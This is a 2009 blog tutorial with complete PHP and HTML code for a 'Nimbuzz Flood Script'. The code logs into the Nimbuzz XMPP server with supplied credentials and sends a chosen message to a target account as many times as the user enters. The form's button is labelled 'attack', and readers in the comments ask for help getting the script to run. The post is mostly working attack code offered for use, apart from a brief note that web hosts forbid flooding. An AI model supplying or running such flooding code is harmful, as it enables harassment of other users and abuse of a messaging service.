In: Web
14 May 2009This posting I wrote as request from Surya about how to launch php web. The exactly he means about how to launch some php script for flood nimbuz server. The scripts found at some underground blog but he doesn’t know how to execution it. Flood script using xmpphp classes for running.
Xmpphp script can be found at http://code.google.com/p/xmpphp
First, you need make some file called index.php as launch script to make parameter for flood.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 | <html> <head> <title>Script Flood Nimbuzz</title> </head> <body> <form method="post" action="send.php"> <table border=1 cellpadding=2 cellspacing=2> <tr> <td>Username</td><td><input type="text" name="user" size=30 /></td> </tr> <tr> <td>Password</td><td><input type="password" name="pass" size=30 /></td> </tr> <tr> <td>id_target@nimbuzz.com</td><td><input type="text" name="target" size=40 /></td> </tr> <tr> <td>Count flood</td><td><input type="text" name="count" size=10 /></td> </tr> <tr> <td>Text</td><td><input type="text" name="texts" size=40 /></td> </tr> <tr> <td colspan=2><input type="submit" value="attack" /></td> </tr> </table> </form> </body> </html> |
After you did the first step, the next is make some php file called send.php. This file contains about flood script with using xmpphp as the plugins.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 | <?php $user = $_POST['user']; $pass = $_POST['pass']; $target = $_POST['target']; $count = $_POST['count']; $texts = $_POST['texts']; $host = "openfire.nimbuzz.com"; $port = "5222"; $resource = "xmpphp"; $server = "nimbuzz.com"; require_once "xmpphp/Log.php"; include "xmpphp/XMPP.php"; $conn = new XMPPHP_XMPP($host, $port, $user, $pass, $resource, $server, $printlog=false, $loglevel=XMPPHP_Log::LEVEL_INFO); try { $conn->connect(); $conn->processUntil('session_start'); $conn->presence(); for ($i = 1; $i <=$count; $i++) { $conn->message($target, $texts); } $conn->disconnect(); } catch(XMPPHP_Exception $e) { die($e->getMessage()); } ?> |
Before you launch this script, because this script using xmpphp so you must download xmpphp first into your web directory. To download xmpphp classess, click here. The xmpphp only 21 KB of files.
Upload the xmpphp to your web directory same with index.php and send.php directory, then extract it.
After you finish all step above, you can launch your script happily. But, attention: many hosting has policy to not allow you for using their resources for flooding or doing something bad.
This blog is made by Muhammad Baiquni, dedicated to give all of you information about Computer, Security, Ebook reviews, Software, Tutorial, Web: HTML, PHP, MySQL, CSS, and more of million information.
If you like, please bookmark this web or feed us for be the first one get our newest information.
6 Responses to Nimbuzz Flood Script
xbox
May 20th, 2009 at 12:30 pm
Waiting for another article.
Kelly Brown
June 13th, 2009 at 2:55 am
Original post by Dmitri Gromov
c4ns3t
July 2nd, 2009 at 12:29 pm
Hmm. . . .I can’t get it well about it. can i make a flood from my operamini in my phones?Help me please,to do that,send me an e mail at ahmadpoetra@yahoo.com
tanto.saja
July 13th, 2009 at 9:48 pm
yeah… can u tell me about error messege “Could not connect before timeout” when i run it?
radwan
August 10th, 2009 at 11:33 am
i have this error
Parse error: syntax error, unexpected ‘)’, expecting ‘(‘ in /data/members/free/tripod/uk/r/a/d/radwantm55/htdocs/send.php on line 17
after ckick attack
SiR.BlaCk
January 6th, 2010 at 4:52 pm
Hey How To Extract This tar file on ma website ?